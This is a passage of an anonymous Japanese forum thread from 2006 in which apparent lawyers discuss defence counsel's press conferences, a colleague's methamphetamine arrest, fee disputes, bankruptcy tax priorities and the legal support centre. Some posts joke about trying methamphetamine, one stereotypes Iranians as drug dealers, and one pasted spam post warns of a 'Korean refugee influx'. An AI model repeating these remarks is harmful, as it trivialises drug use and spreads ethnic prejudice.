
>>93
法務博士はロースクールを卒業するともらえる学位ですよ。

95 :無責任な名無しさん:2006/06/12(月) 11:46:36 ID:vCsvQMgr
>>94
どうも、ありがとうです。
予校での年配層が目立つのは、若年層がロー生へと流れているからでしょうが、
予校の現在状況として教室は親父臭ですよ。
ロー制度で、
予校も、経営シフトを書籍販売に移しているみたいで、いろいろな意味で、ロー生より不利。
先輩弁の歩まれた道程や光景と、現在は一変してますよ。(サビれてるw)

予校生、御用達食堂の親父さんが、アフターコーヒーサービスしてくれます。
ランチ行って、午後から出ようかな〜。

96 :無責任な名無しさん:2006/06/12(月) 12:16:36 ID:icV4zf0v
>>95
いいから勉強しなさい

97 :無責任な名無しさん:2006/06/12(月) 12:54:10 ID:plGfER2U
>>16 司法取引じゃなくって報道取引だな。
 被疑者の供述内容を記者発表しないと、何時までも執拗な取材攻勢をかけるということか。

98 :無責任な名無しさん:2006/06/12(月) 13:45:37 ID:rbjtG6TO
>弁護士が記者会見を開いた主な理由は「家族への取材を自粛してもらうため」だった。
>それは、「家族を守りたい」という畠山容疑者の強い意向を受けたものだった。
>
> 会見前、弁護士は報道各社に(1)容疑者の親族には、取材しない(2)親族の顔や
>姿の写真や声を、掲載・放映・再生しない(3)親族の取材は、弁護士を通じて書面で
>――という三つを要望した。朝日新聞社などが加盟する秋田県警記者クラブは、この要
>望について「最大限配慮し、節度ある取材、報道に努める」と申し合わせた。会見は、
>そのうえで始まった。



なかなか難しい判断だね。
弁護士が「自分の業務が妨害される」からしゃべりまくるような場合は論外だが,本件のように,
被疑者本人の希望であれば,やむを得ないところもあるか。

99 :無責任な名無しさん:2006/06/12(月) 14:00:18 ID:XQXGJQrN
被疑者本人が希望すれば、まあいいんじゃないの。
今回は、被疑者自身もいろいろ取材を受けていたし、マスコミが家の前で
張り込んだりしてたから、マスコミの実態も分かった上で、弁護士にマスコミ対応
依頼することまで希望していたのだろうし。

問題は、被疑者本人がマスコミ対応を望んでいるかはっきりしないときかな。
マスコミに何も言うなと言ってくれれば、こちらも断固として拒絶できるけど、
お任せしますとか言われてしまうと本当に困る。
私自身は、被疑者段階ではほとんど被疑者の具体的な供述内容をしゃべら
ないことに決めているけど、最近の弁護人のマスコミ露出を見ていると、それが
正しい対応なのか、正しくないのか迷ってしまう。

100 :無責任な名無しさん:2006/06/12(月) 14:26:47 ID:D/yd3wzV
被疑者親族への取材制限、マスコミ対応と、被疑者の言い分開示
とは別の次元だと思うんだわ。
メディアスクラムはやめてもらう、弁護人がマスコミ対応の窓口となる
ここまではいい。でも被疑者の言い分を詳しく公表する必要はないし、
妥当とも思えない。
警察は、おまえんところの弁護士はこう言ってるぞ知ってるか、くらいの
揺さぶりはかけてくる。警察は、弁護人活動で被疑者の供述が後退することを
非常に嫌がるからな。
>>99の対応で正しいと私は思う。

101 :無責任な名無しさん:2006/06/12(月) 15:43:59 ID:icV4zf0v
メディアスクラムに対し仮処分通るかなあ

102 :無責任な名無しさん:2006/06/12(月) 17:31:09 ID:eh799ZXM
http://news18.2ch.net/test/read.cgi/bizplus/1149365329/

103 :無責任な名無しさん:2006/06/12(月) 21:44:09 ID:8Fru0SWn
>>88
日当目当てだろ?

東京同士の弁護士で、相手から訴訟移行の通知が来たので、「合意管轄にしましょう、東京地裁でやりましょう。」といったが断られた。
当事者が傍聴したがっているのかな、と思ったけれど、そうでもなかった。
結局、日当目当てとしか合理的に説明が付かないと思った。

意地悪して何度か期日を空転させてやった。

104 :無責任な名無しさん:2006/06/12(月) 22:59:11 ID:3ppDzqlc
>>103
温泉やゴルフ目当ての東京の先生もいますよ。
札幌なんか東京から飛行機で正味3時間(フライト1時間半)だから,日帰り可なのに。
必ず天然温泉付きのシティホテル(市内に温泉が出る)に泊まり,翌日は携帯に電話すると,背景で「ナイッショ」が聞こえるんだよね。

105 :無責任な名無しさん:2006/06/12(月) 23:11:18 ID:pQAaZWQU
>温泉やゴルフ目当ての東京の先生もいますよ。
期日を見ればだいたいわかる。
月曜・金曜に入れたがる・朝一、夕方に入れたがる。
一泊したいのが見え見え。

106 :無責任な名無しさん:2006/06/12(月) 23:45:54 ID:6/bi3ikp
横浜弁護士会、覚せい剤所持の弁護士に懲戒請求
http://headlines.yahoo.co.jp/hl?a=20060612-00000415-yom-soci

鎌田弁護士は弁護士会の聴取に対し、所持を認めたうえで、「法律相談を
受けたいと呼び出され、待ち合わせ中に外国人に茶封筒を渡された。入って
いるのが覚せい剤とは思わなかった」と釈明している。

典型的な・・

107 :無責任な名無しさん:2006/06/12(月) 23:48:03 ID:kr0VLaCQ
日本が負けそうだ。みんなで奇跡を祈れ。

108 :無責任な名無しさん:2006/06/12(月) 23:49:11 ID:kr0VLaCQ
 日本が負けそうだ。みんな祈れ。

109 :無責任な名無しさん:2006/06/12(月) 23:52:41 ID:3ppDzqlc
>>106
自宅や事務所から別の薬物が出てきたら洒落にもならん

110 :無責任な名無しさん:2006/06/12(月) 23:55:29 ID:kr0VLaCQ
 当会所属の弁護士3-4名(J1チーム顧問弁護士等)はドイツでサポーター活動をしてい
るのだが,みんな悔しがっているだろう。

111 :無責任な名無しさん:2006/06/12(月) 23:57:18 ID:ZrFcRloM
>>109
まず強制採尿で(ry

112 :無責任な名無しさん:2006/06/12(月) 23:59:32 ID:6zVQVPQy
>>106
なんだこの 29歳・無職・前科なし・前歴あり みたいな弁解。

113 :無責任な名無しさん:2006/06/13(火) 00:02:06 ID:3ppDzqlc
>>102
さすがにパチンコ店や柏駅で氏名不詳のイラン人からもらったとは言えなかったんだろ

114 :無責任な名無しさん:2006/06/13(火) 00:02:28 ID:kr0VLaCQ
【ワールドカップ中は】弁護士本音talkスレPart24【居留守】

115 :無責任な名無しさん:2006/06/13(火) 00:07:54 ID:5F5wz1mP
>>110
 2週間前にシャブを体に入れたら,おしっこ検査で出てくるものだよ。
 シャブでテンパっていると統合失調症類似の症状が現れる。
 シャブを所持している者は,たいてい「使用」している。(営利目的の「売人・ブロー
カー」は例外)。
 弁護士を通常逮捕するには,検事総長の決裁が必要である。


116 :無責任な名無しさん:2006/06/13(火) 00:25:29 ID:IrdycXlE
>>115
今は検事正決裁と高検の了解だけだよ
あまりにも弁護士の通逮が多くなったから

117 :無責任な名無しさん:2006/06/13(火) 00:49:54 ID:JF1fXGv3
とうとう弁護士でも覚せい剤で捕まる人が出たのか・・・
しかし、60歳とは

118 :無責任な名無しさん:2006/06/13(火) 00:59:29 ID:IrdycXlE
せめて
被告人の家族から預かった証拠品で任提予定でした
くらい弁解しないかー(違う

119 :無責任な名無しさん:2006/06/13(火) 01:16:36 ID:8pPnRHrj
でもさ、
覚せい剤取締法違反被疑(被告)事件の調書を読んでいると、
一度くらい試しに使いたいなぁと思う時があるんだよね。
頭髪が逆立ってというやつ。

そんな私って、ヤバイのかなぁ。

120 :無責任な名無しさん:2006/06/13(火) 01:31:15 ID:lB23HlvH
ところで、現行犯逮捕らしいけど、どんなシチュエーションで
捕まったんだろうか。
職質されても、弁護士なら法律論を振りかざして突っぱねることも
できたのではないかとも思うのだが。

121 :無責任な名無しさん:2006/06/13(火) 02:29:32 ID:5F5wz1mP
 覚せい剤は使用でも所持でも罰金刑はなしだから,懲戒
委員会議決の前に当然失職かも知れない。(偽証教唆した某弁護士さんはどうだっ
たっけ?)まさか検事パイにするわけにも行かないだろう。
 あるいは,1審懲役刑後,確定前に速攻で,「除名」かも知れない。2週間あ
れば,懲戒委員会の結論も出るだろう。
 しかしさぁ,60歳といえば「中小規模単位会」だと会長経験者のわけよ。
 懲戒・綱紀委員会もやりにくいだろうなぁ。

122 :無責任な名無しさん:2006/06/13(火) 02:59:52 ID:5F5wz1mP
>>119
 「弁護活動の充実のため,覚せい剤の効果や覚せい剤被告人の感覚を体験し
てみたかった」と言うことで,「正当業務行為だから違法性を阻却する」
とか主張して,会有志を募って弁護してあげよう。

123 :行き詰まり弁護士 ◆BAKA/8y6zk :2006/06/13(火) 03:17:06 ID:+WU88ycF
この先生,修習生の頃メシおごってもらったことがある。しゃれにならん・・・。

124 :無責任な名無しさん:2006/06/13(火) 06:33:02 ID:IDtkLvZ6
>>120
マークされていたに決まっとる

125 :無責任な名無しさん:2006/06/13(火) 06:40:36 ID:IrdycXlE
>>124
身体検査令状と自宅捜索差押え令状を執行されてシャブ発見
発見したシャブの所持事実で現行犯逮捕が普通だよ

令状が特定したシャブ(たいてい○○から譲受け)と発見したシャブの同一性が不明だから現行犯逮捕するという法理論

126 :無責任な名無しさん:2006/06/13(火) 09:33:44 ID:AMYfy+To
司法制度改革の被害者といえるであろう。

127 :無責任な名無しさん:2006/06/13(火) 09:54:06 ID:vXEHflu5
>>119
それはみんなあるだろ。
そのうち誘惑に勝てないやつらが手を出してしまう。

128 :無責任な名無しさん:2006/06/13(火) 09:55:23 ID:vXEHflu5
研修所の白表紙に「検事パイでおk」っていうセリフがあったのを思い出した。

129 :無責任な名無しさん:2006/06/13(火) 11:21:28 ID:eWqBsYF/
調書に、ネタを使うとセックスがよいのです、とか書いてあることあるなw
どんなんだよと思うわな、やっぱ。

130 :無責任な名無しさん:2006/06/13(火) 12:55:07 ID:W5gHkBTr
ま,セックス目的なんだけど,ストレス発散とかって言い張るんだろうなあ


131 :無責任な名無しさん:2006/06/13(火) 12:56:19 ID:W5gHkBTr
>>127
ねえよ。
おまえは懐かしの55期(?)マッシュルーム野郎かよ



132 :無責任な名無しさん:2006/06/13(火) 12:58:54 ID:5FuDn+2X
大増員時代ででてきそうな弁護士は
暴力団構成員の弁護士、常習累犯窃盗の弁護士、殺人の弁護士、強盗の弁護士
強姦の弁護士などだな・・

133 :無責任な名無しさん:2006/06/13(火) 13:15:23 ID:MIBnLO4l
>>132
常習累犯窃盗の弁護士って、常習累犯窃盗被告事件を弁護する弁護士ってこと?
常習累犯窃盗で処罰される弁護士っていうのは、現実的にはあり得ない。
窃盗で有罪判決もらった時点で資格が無くなるだろうから、常習累犯窃盗を
犯すことは不可能では?

ま、ネタにマジレスしてもしょうがないけどさ・・・

134 :無責任な名無しさん:2006/06/13(火) 13:23:18 ID:YbLyUjjz
>>131
興味を引くような書き方はしてるわな。
俺も覚せい剤取締法違反の調書で「シャブを打ってセックスをすると、とても気持ちがいいのです。」
「天に昇るような気持ちになるのです。」「シャブを打ってセックスをしたときに快感が忘れられなくて、
また使ってしまったのです。」なんてのを見かける。
こういう文章見たら、好奇心旺盛な人間なら「シャブを打ってセックスをしたときの快感って
どんなものなんだろう?」とか思うわな。

まあ、多くの弁護士はシャブに手を出した人間の転落状況や中毒症状からの脱出の困難さや
逮捕されたときに失うものなどを考えて、シャブには手を出さんわけだが。

135 :無責任な名無しさん:2006/06/13(火) 13:43:14 ID:o9Mkg/++
普段より射精が格段に気持ちよくなり、それも一瞬で終わるのでなく、
気持ちよさが何十分も持続するのだそうな。

136 :無責任な名無しさん:2006/06/13(火) 15:14:30 ID:7eQ+UtMw
 深夜労働が何日か続くときに、覚せい剤を打てば疲れを感じなくなるというのを思い出す・・。
あと、気が重い負け筋事件の起案をしているときにも、気分が爽快となるというのを思い出す・・・。
たまに、覚せい剤に手を出して、それが発覚して資格を失うという夢を見る・・・。

137 :無責任な名無しさん:2006/06/13(火) 15:19:43 ID:5FuDn+2X
>>133
やはし、釣れたな

138 :無責任な名無しさん:2006/06/13(火) 17:27:12 ID:/tOaMxaR
>136
すげー分かる。
負け筋事案だと起案が進まない。
起案が進まないと、夜中までかかってしまう。
これ以上はやばいと思う日の夜中に重い腰を上げるが眠いしテンション低いし
やりたくない。
こういうときに、シャブ被告人の言い分を思い出すよ・・・。

139 :無責任な名無しさん:2006/06/13(火) 23:09:13 ID:D7AB92/L
せめてリタリンあたりで手を打たないと・・・
どうやって入手するかが問題だが。

140 :無責任な名無しさん:2006/06/13(火) 23:17:52 ID:5F5wz1mP
 東京地裁内の地下売店で4000円ぐらい各種薬剤を呑め。

141 :無責任な名無しさん:2006/06/14(水) 01:23:11 ID:sN4MzTRw
最高裁が靖国訴訟の上告受理して判決だってさ。
わざわざ上告受理したんだから法律判断するんだろうな。
「蛇足」(by井上薫)でも言うのかね。まさか「世俗的」とは言わんだろ。
掟破りの実質的認定変更で、私的行為とするとか。
原審が私的行為という認定で、公的行為と認められるけど、原告の
利益は侵害されてないというのかもありか(これも元裁判官流に言え
ば蛇足だが)。

142 :無責任な名無しさん:2006/06/14(水) 02:17:22 ID:Wkb2tOxt
>>140
胸焼けで気分が悪くなるのがオチ
>>141
上告受理しない方が問題じゃないかな?
重要な法律問題を含まないと言い切る訳だから。

143 :無責任な名無しさん:2006/06/14(水) 10:24:49 ID:1JNOLmsK
おにいちゃんCD
http://www.tanomi.com/shop/dvd/items03458.html

たったったっ大変だっ!なんと「おにいちゃん」というセリフのみ、合計で1200もの「おにいちゃん」が聴ける
ボイスサンプリング集が登場です!
12人の声優による1200の「おにいちゃん」には、「すごく照れながら」、「おねだりするように」、「甘えるように」、
「ちょっと切なく」など、100種類のシチュエーションを12人の声優が連呼、連呼、連呼!!いままでにない萌え
系のボイスサンプリング集。“妹系”ファン待望の一枚です。


妹好きな方どうぞw


144 :無責任な名無しさん:2006/06/14(水) 12:28:01 ID:9pd2CRsE
秋田の先生、また記者会見をして、被疑者の「自白」内容を発表してますね。
ご丁寧に、自白内容の変遷の理由まで説明されています。
(捜査官の追求による内容の合理化・真実性)

警察発表よりも詳しいので(具体性)、よく分かりますが(迫真性)、
裏付けを取っていないところ(なぜ、軍手や腰紐がそこにあったのかなど)
が気がかりですね。

果たして、こんなにシャベッテいいんでしょうか????


145 :無責任な名無しさん:2006/06/14(水) 12:30:14 ID:1JNOLmsK
ま,保険にはちゃんと入ってるんだろうと思うね
懲戒は知らない

146 :無責任な名無しさん:2006/06/14(水) 14:49:23 ID:iuUhJuD4
>>144>>145
>>98-100

147 :無責任な名無しさん:2006/06/14(水) 15:17:38 ID:srb8nqRX
>>144
いずれにせよ,画期的なマスコミ対応ではあるね。
恐ろしくてとてもまねできないけど。

148 :無責任な名無しさん:2006/06/14(水) 15:36:12 ID:vi2J1MO5
すみません。当方非弁ですが、質問します。
やっぱり弁護士さんはメディアとか表舞台に出ることを嫌がるのですか?

149 :無責任な名無しさん:2006/06/14(水) 17:18:22 ID:06YMhg5h
損得から言えば、何もしゃべらず、捜査側の証拠を見極めてから、いろいろ弁解を
考える方が得であることは言うまでもないわな。
何故にそんなにべらべらしゃべる?

150 :無責任な名無しさん:2006/06/14(水) 18:27:02 ID:nq9WdcWh
秋田の弁護士さん変な髪型。お坊ちゃまくんみたい

151 :無責任な名無しさん:2006/06/14(水) 18:34:59 ID:zx2geSRG
男児殺害 弁護士会見で危ぶまれる人権
http://news.livedoor.com/webapp/journal/cid__2071799/detail

152 :無責任な名無しさん:2006/06/14(水) 22:34:44 ID:tjF0REsu
マスコミの連中は自分たちによる人権侵害は考えたことあんのかな

153 :無責任な名無しさん:2006/06/14(水) 22:45:23 ID:ZYTBtrDH
新聞テレビは,まあ,こちらが一応真摯に対応すれば,言えないことは言えないとわかってくれるし,取材協定もおおむね守ってくれる。
協定自体がかなり報道の都合を優先するようになるけれども。
ところが,週刊誌や不肖宮嶋の類がひどい。
協定は当然守らない。親類縁者のところに押し掛ける。弁護士の事務所や自宅にも深夜早朝問わず電話攻勢。
しまいには弁護士の親族や近隣の弁護士の事務所や自宅にまで「何か聞いていないか」と押し掛ける。
わざと電話でこちらを怒らせようとする。ドアを開けるなりいきなり写真を撮る。隣のビルの窓から事務所をカメラで覗く。事務所から出たらすぐ尾行。
飲みにでも行ったら「殺人事件の弁護をしながら夜は…」と書かれる。
一般市民からの抗議の電話なんてかわいいもの。民暴対策のほうがよっぽどまし。
一度,大事件の弁護団に入ってみてください。身をもって体験できます。

154 :無責任な名無しさん:2006/06/14(水) 22:59:58 ID:iLkaR7Bg
【政治】 "脱北者の保護・支援も" 「北朝鮮人権法案」、衆院通過→今国会で成立へ★2
http://news19.2ch.net/test/read.cgi/newsplus/1150199165/l50

このままでは大増税!! 朝鮮人難民流入!?! 『北朝鮮人権法案』 !!

絶望するだけ、諦めるだけ、愚痴るだけ では何も変わりません!!!!

まだ間に合います!!17日までが戦いです!今、出来る事(メール・電話・ネット伝播)をみんなでやりましょう!!

■■■■■■■■■■■■■■■■■■■■■■■■■■■■
     17日の参院でのストップを目指しています!
   時間がありませんっ!!どうか、手伝ってくださいm(_ _)m
■■■■■■■■■■■■■■■■■■■■■■■■■■■■

155 :無責任な名無しさん:2006/06/14(水) 23:30:00 ID:tjF0REsu
>>153
なんの事件やったの?

156 :無責任な名無しさん:2006/06/15(木) 09:40:53 ID:4IklA45z
>>153
そこまでってのは凄いね。オウム、カレークラスの事件だろうね。

でも、加熱報道の問題と、弁護人の情報開示の問題とはやはり別だと思う。
加熱取材を避けるために弁護人が情報開示するというのは理由にならない。
あくまで被疑者被告人の正当な利益を守ることを考えるべきでは。


157 :無責任な名無しさん:2006/06/15(木) 10:50:09 ID:cckP+3OK
情報不足のままマスコミが根拠のない被疑者の誹謗中傷へ走る前に、先手を打って
情報開示して報道内容をある程度コントロールする・・・ってのは、理屈としては
ありかもなあ。
実行は大変そうだけど。

158 :無責任な名無しさん:2006/06/15(木) 11:29:13 ID:IcKaL7HI
本人が否定している殺人事件の被告の弁護を受けマスコミもにぎわすような
大きな案件となってしまった。証拠もなくアリバイもありこのままでは被告
を無罪にもっていけそうな案件があったとする。もちろん被害者の家族は悲観
にくれて一家崩壊もしている状況である。
そのとき被告が突然裁判外で「実は私がやりました。証拠はこれです。」と
まぎれもない事実を突きつけられたときは弁護士さんはどうするのですか。
それでも無罪にもっていくのが使命なのですか。それともその証拠を裁判で
提出するのですか。
私は後者だと思うのですが、前者ならなんとも言いようがありませんし弁護士
という職業を軽蔑せざるを得ません。

法律には素人なので教えてください。

159 :無責任な名無しさん:2006/06/15(木) 11:32:29 ID:nxH4nkni
>>158
スレ違い

160 :無責任な名無しさん:2006/06/15(木) 12:03:45 ID:e2+pV/6d
>158
 その場合は、辞任しなければなりません。というわけで、お引取りを。

161 :無責任な名無しさん:2006/06/15(木) 13:39:00 ID:HVoXu1Ea
>>158
ある程度弁護士に興味がある人だろうけど、世間に弁護士の役割をわかってもらうのは
如何に困難か実感するなぁ。  

162 :無責任な名無しさん:2006/06/15(木) 13:56:32 ID:3U6aJTxt
>>>158
「弁護士」「真実義務」でぐぐれ。

163 :無責任な名無しさん:2006/06/15(木) 15:31:18 ID:5xraZ3HI
うぜー
あるベンチャーから法律相談受けて、依頼に基いて意見書作って、30万弱請求したら、10万未満じゃないといやと言われた。
時間制報酬て説明したのに。。
もうこの際手を切ろうかな。

なんか俺が嘘を言ったとか言ってくるし、付き合いきれん

164 :無責任な名無しさん:2006/06/15(木) 16:25:53 ID:ZdqqA5Hq
>>163
何時間程度掛かるか言ってないんじゃないの?
いいなあ言いなりで普通もラッテんだろうね

165 :無責任な名無しさん:2006/06/15(木) 16:52:56 ID:4IklA45z
秋田県警に「異例だ」とコメントされてしまう弁護人会見。
「取調は長時間に渡っていますが、最低限の食事はとっています」
との弁護人コメント。

東京から弁護人派遣しろ。秋田県弁じゃダメだ。
まじであきれた。

166 :無責任な名無しさん:2006/06/15(木) 17:46:33 ID:jYamul4O
ベンチャーなんて、たいていはカスみたいなところだろう。
弁護士を信用してくれない依頼者とは、いずれトラブって嫌な
思いをすることは目に見えてる。

167 :無責任な名無しさん:2006/06/15(木) 18:03:34 ID:FwZiW4u8
>>163
切れ
そのままずるずるやってると,おまえが安くなる
20万を惜しむような会社は,どうせ大きくならない

俺だったら切る

168 :無責任な名無しさん:2006/06/15(木) 18:55:28 ID:3U6aJTxt
>>165
ソースキボンヌ

169 :無責任な名無しさん:2006/06/15(木) 19:00:02 ID:fV2Bb4SC
http://society3.2ch.net/test/read.cgi/hosp/1132362066/l50

734 :卵の名無しさん :2006/06/15(木) 15:53:41 ID:iELkwJ7+0
俺、今ある女を誘ってるんだが…
OLで最初は遊んでやろうなんて感じだったんだが何度声かけても
誘いに乗って来ない
何故かと聞いたら、自分と俺とは住む世界が違う感じがして、と言った
俺はその時思った
よく、結婚相手は医者じゃなきゃ、それ位のレベルじゃなきゃ、の
考えが多い女の中、そんな台詞を吐けるとは
その瞬間色々考えさせられたね
もしいつか彼女がOKしてくれたら食事に誘って、そしていつかは…
今はまだメールだけの付き合いだが、一つ一つの彼女の質問の答え
上手くは言えんが…
愛とはこういうものだと思う
大事なのは心
「オプション」なんかはどうだっていいと思う

石板にあったんだが…
わかるな、この医者の気持ち
エリートってそれだけでもてはやされるから
こんな女もいるんだな

170 :無責任な名無しさん:2006/06/15(木) 19:23:19 ID:GhwT5o9d
医師にしろ弁護士にしろ
勘違いしてくれる人がいるから
生活が成り立っている。

弁護士に対する勘違いが
滅びてしまいそうなことはナイショだ。

171 :無責任な名無しさん:2006/06/15(木) 20:22:49 ID:2i1I+Zf1
ちっとも甘えさせてくれないわ〜。
センセったら。

172 :無責任な名無しさん:2006/06/15(木) 20:26:17 ID:lStwe7ZL
>石板にあったんだが…
>わかるな、この医者の気持ち
>エリートってそれだけでもてはやされるから
>こんな女もいるんだな

医師版を見てるだけできもいのに
エリート気取りの弁護士ってw

173 :無責任な名無しさん:2006/06/15(木) 22:17:48 ID:nxH4nkni
弁護士だからってすり寄ってくる女結構多いぞ。




…合コンに行くと。


174 :無責任な名無しさん:2006/06/15(木) 22:31:49 ID:NOD8jXt0
破産管財事件においては破産手続開始前の原因に
基づいて生じた租税等の請求権(公租公課)のうち
破産手続開始当時納期限から1年を経過しているものは
財団債権ではなく優先的破産債権に格下げされます。
この優先的破産債権に格下げされた公租公課の中では
公租が公課に優先します。
ここで取り扱いをどうするか疑問なのが国民健康保険税です。
形式的に考えると国民健康保険税も地方税の一つ
(地方税法の中の市町村税の中の目的税)ですから
公租として扱っても良いように思えます。
しかしそう考えると国民健康保険の財源として
同じである国民健康保険料が公課として扱われる
ことと不公平です。
形式的に考えると優先的破産債権として
健康保険税を届け出た自治体と
健康保険料を届け出た自治体とで前者が後者に
優先するという結果になります。
これでいいのでしょうか。
それとも中身は同じだから両者とも公課と考えるのでしょうか。
皆さんはどう考えますか。


175 :無責任な名無しさん:2006/06/15(木) 22:47:02 ID:KwJbiFP6
依頼者にアドバイスしたら、「分かりました。弁護士に相談してみます」と言われました。orz

176 :無責任な名無しさん:2006/06/15(木) 23:10:55 ID:wR6z9hfe
>>116
多いって言っても,年に1回あるかないかでしょ?

177 :無責任な名無しさん:2006/06/15(木) 23:12:23 ID:mEbVj+n8
多重債務者に破産しかないとアドバイスしたら、「家族と相談します」と言われ、
後日、「家族に反対されたからもっとがんがってみます」と返事が来た。
あんたがいくらがんばっても借金は増えるばかりだと思うよ。

178 :無責任な名無しさん:2006/06/16(金) 09:02:07 ID:hRtkcRpu
>>174
保険料と保険税で扱いが変わってしまうのはしかたがあるまい。
俺なら、書記官に確認し、裁判所の意向を確認してからそのように取り扱うけどね。
破産手続きは、裁判所によって扱い方に違いがでることがあるし。


179 :無責任な名無しさん:2006/06/16(金) 09:39:07 ID:pxlMCJ/U
>>178
全くその通りだな

180 :無責任な名無しさん:2006/06/16(金) 11:36:01 ID:pxlMCJ/U
汚い仔犬を見つけたので虐待することにした。
他人の目に触れるとまずいので家に連れ帰る事にする。
嫌がる犬を風呂場に連れ込みお湯攻め。
充分お湯をかけた後は薬品を体中に塗りたくりゴシゴシする。
薬品で体中が汚染された事を確認し、再びお湯攻め。
お湯攻めの後は布でゴシゴシと体をこする。
風呂場での攻めの後は、全身にくまなく熱風をかける。

その後に、乾燥した不味そうな塊を食わせる事にする。
そして原価10円にも満たない塩素臭のする飲み物をたらふく飲ませる。
もちろん、器はダイソーで買ってきた100円のものだ。
最後に無理やり保険適用外の怪しい錠剤を口の中に放り込む。

その後は首輪をつけて紐で無理やり引っ張りながら近所を引き回し、
野外スカトロプレイで浅ましい姿を皆さんに見てもらう。
排泄物は透明のビニール袋に入れて持ち歩いて羞恥心をさらに喚起。
草ぼうぼうの庭に鉄の鎖でつないで,板で作った囲いの中に入りたきゃあ入れるように放置して就寝。


181 :無責任な名無しさん:2006/06/16(金) 12:18:35 ID:Hw92cBDk
身近に弁護士がいるのだが付き合いにくい。
自分が間違っていても認めない。何かを説明するとき、君にも分かるだろうという感じでわざと法律用語を
使わず噛み砕いて説明してくれたりするのだが、こちらは最初からそんな返答は求めていなかったりする。
俺は君や君たちよりは知っている。・・というのが見え見えで話を聞くのもいやになる。
あまりにも近すぎてその人を無視することはできないのでどうしたものだろうか。
昔から言う「先生と名の付く職業には気をつけろ」の典型のようだ。
特に被害はないのだが聞きたくもない話を聞くのは時間の無駄でうっとうしい。

182 :無責任な名無しさん:2006/06/16(金) 12:21:56 ID:QkdUwj9M
>>181
聞きたくもなく,求めていないのに説明するの?

183 :無責任な名無しさん:2006/06/16(金) 15:33:15 ID:r+kgeM+5
>>163です。
切ることに決めました。
当方は19万で良いと言ったのですが、未だに10万未満じゃないと納得できないなどとうるさいので。

特に、嘘を言ったなどと言われており、信頼関係を維持するのは困難だと判断しました。
ご意見下さった方々ありがとうございました。

184 :無責任な名無しさん:2006/06/16(金) 20:45:04 ID:rJa63omM
 当方は,在日外国人の民事・刑事が多いのですが,値切ら
れることを念頭に置いて,着手金・報酬を提案します。まぁ,和解み
たいなもんですわ。
 高裁の民事事件でとても親切な主任裁判官がいて,とってもハッピーでした。

185 :無責任な名無しさん:2006/06/16(金) 22:46:21 ID:6mwCo3Md
今度,離婚事件を扶助でやらなければならなそうだ。
ふー。
破産事件を2件扶助でやるから
見逃して欲しい。

186 :無責任な名無しさん:2006/06/17(土) 00:14:22 ID:xkgMC6w9
そのうち扶助事件も取り合いになるよ

187 :無責任な名無しさん:2006/06/17(土) 07:12:53 ID:nAfGOFDV
東京だともう取り合いになってるそうじゃないか

188 :無責任な名無しさん:2006/06/17(土) 20:56:14 ID:F84F2mo7
田舎に行けばまだ悠々自適の生活が出来るところがあるというのに
どうして東京にしがみつくのだろうか?
(もっともそんな田舎も10年後は分からないが)

189 :無責任な名無しさん:2006/06/17(土) 21:36:46 ID:WMuPgZlm
弁護士って月収いくらくらいなんですか?><

190 :無責任な名無しさん:2006/06/17(土) 21:56:40 ID:TAeJrx+2
>田舎も10年後は分からない

やはりこれが大きいのではないでしょうか。
地方の小都市で修習させていただきましたけれども,
地域経済が衰退して出口も見えない状態で,
弁護士数が急激に増大する可能性があることを考えると,
あまり明るい展望が見えてきません。
地元の先生方も軒並み,これから来る新人は
自分たちのような生活を望むのは無理と仰るような状況です。
(増えて欲しくないということでしょう。)

いずれにしろ厳しいならライフスタイルの合う
首都圏で暮らそうという人が少なくないのでしょうね。

191 :無責任な名無しさん:2006/06/17(土) 22:52:11 ID:bxVjRbGP
弁護士さんで将来登記業務への参入を考えておられる方はいらっしゃいますか?

192 :無責任な無責任:2006/06/17(土) 23:03:32 ID:x9t+ARDT
登記も税務も弁の死後戸になるんで内科医。


193 :無責任な名無しさん:2006/06/18(日) 00:23:21 ID:m8GiCRVT
燃料投下。昨日の毎日より。

司法支援センター=社会部・森本英彦

スタッフ弁護士の確保が課題


>> 業務を円滑に行えるかどうかは常勤の「スタッフ弁護士」の確保にかかっている。日本
>>弁護士連合会は09年までに300人を確保する目標を立てたが、めどは立っておらず、
>>人材の発掘・養成が急務だ。また、10月から捜査段階の容疑者にも国選弁護が広がる
>>ことから、支援センターと契約を結んで国選弁護を担う弁護士を増やすことも課題だ。

毎日新聞 2006年6月17日 東京朝刊

http://www.mainichi-msn.co.jp/eye/kaisetsu/news/20060617ddm004070094000c.html


司法支援センターは「国策」だ。「市民のための司法」を実現するために日弁連執行部も懸命
に努力している。一部の弁護士が法テラスに非協力的なのは問題だ。いくらロー卒が大量に
法テラスを希望したところで指導する人間がいなければ話にならない。多少の問題点はある
かもしれないが、民主主義は妥協の産物だ。「法の支配」を実現するため皆さんも積極的に
法テラスに登録していただきたい。くれぐれも弁護士会の面子を潰すようなことは避けなけれ
ばならない。


194 :無責任な名無しさん:2006/06/18(日) 00:24:55 ID:s0oeiqy1
これからは後見事件が狙い目だと思うのだが。

195 :無責任な名無しさん:2006/06/18(日) 00:35:58 ID:+DYv3OzM
>>192
出来っこない

196 :無責任な名無しさん:2006/06/18(日) 00:37:03 ID:+DYv3OzM
>>194
もう既に後見事件がかなりの部分を占めてますが

197 :無責任な無責任:2006/06/18(日) 05:41:04 ID:N44itxmt
 弁も胃きるために歯、難でもヤルし、ヤレル酔うに熟れる。
 
 関係凝壊との棲み分け消滅。

198 :無責任な名無しさん:2006/06/18(日) 15:34:58 ID:EqvWr6wO
法テラスは日弁連のメンツの落とし子でしたか。なるほど。

そして、私どもには、年会費を上納するほかに、
そのメンツを保つために、法テラスにも租庸調の○(人的耕納)を納めろッテことですか。
アンタは、理事者の回し者さん?

199 :無責任な名無しさん:2006/06/18(日) 15:35:23 ID:NyikdTur

193>くれぐれも弁護士会の面子を潰すようなことは避けなけれ
ばならない。

つぶせるような立派な面子ってあるんですか?

200 :無責任な名無しさん:2006/06/18(日) 15:50:35 ID:TBmmzVeV
あると思っているんだろ、執行部は。
893の面子と一緒で、端から見ると大したことなくても
当人だけは大事にしているw

201 :無責任な名無しさん:2006/06/18(日) 16:28:10 ID:OPLSHnNS
>193
「法の支配」を守るためには刑事裁判が公正に行なわれなければならないんだが。
この日弁連の犬は相当頭悪いね。

202 :無責任な名無しさん:2006/06/18(日) 16:36:41 ID:TBmmzVeV
法務省が個別の事件の弁護方針に口出しできるわけではないのに、
なんで法テラスが刑事裁判の公正に反するのだろう?

203 :無責任な名無しさん:2006/06/18(日) 16:40:55 ID:NyikdTur
>202
そんなこと法律に書いてあるか?

